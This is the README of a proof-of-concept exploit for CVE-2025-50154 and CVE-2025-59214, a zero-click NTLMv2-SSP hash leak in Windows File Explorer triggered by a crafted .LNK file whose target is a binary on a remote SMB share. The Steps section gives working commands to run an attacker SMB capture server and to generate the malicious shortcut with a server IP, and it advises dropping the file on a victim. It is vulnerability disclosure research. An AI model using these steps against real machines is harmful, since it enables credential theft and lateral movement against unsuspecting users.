# CVE-2025-50154, CVE-2025-59214

# Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
By [Ruben Enkaoua](https://x.com/rubenlabs) and [Cymulate](https://cymulate.com/)
<br>
<br>
[First Blog: Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154)](https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/)<br><br>
[Second Blog: Patched Twice, Still Bypassed: New NTLM Leak (CVE-2025-50154 Patch Bypass)](https://cymulate.com/blog/ntlm-leak-cve-2025-59214/)
<br>
<br>

#### Description
<br>
While Microsoft released a security update addressing an icon-based NTLM hash disclosure vulnerability, I discovered a bypass that still allows an attacker to retrieve NTLMv2-SSP hashes without user interaction.<br><br>

The original vulnerability, recently patched, was a 0-click NTLM hash disclosure triggered when explorer.exe rendered the icon of a .LNK shortcut file whose icon was hosted on a remote SMB server.<br>
After the patch, explorer.exe no longer loads icons from remote SMB paths, preventing the automatic disclosure of NTLM hashes.<br><br>

Update: The patch for CVE-2025-50154 didn't work at all. We reported it, and a new CVE was assigned to the vulnerability: CVE-2025-59214. The POC is relevant for both CVE's.<br><br>

By crafting a .LNK file with:<br>
+ Default icon from shell32.dll<br>
+ Target path pointing to a remote SMB-hosted binary file<br><br>

The explorer.exe process will still fetch the remote file to extract the PE icon from its RT_GROUP_ICON and RT_ICON resources.<br><br>

![DA-NTLMv2-SSP-leak](https://github.com/user-attachments/assets/37674962-bc16-462f-b4fe-e80a3fc0aa8b)<br><br>


#### Steps
<br>
Start a responder server in your server<br><br>

```bash
# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
```
<br>
Craft a malicious LNK with powershell, in a different machine, and then drop it to the victim (malicious download, SMB upload...)<br><br>

```powershell
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"
```
<br>
The explorer.exe process will render the icon by downloading the file automatically, looking for RT_ICON and RT_GROUP_ICON headers in .rsrc section
<br><br>

#### Notes
<br>
This code is for educational and research purposes only.<br>
The author takes no responsibility for any misuse of this code.
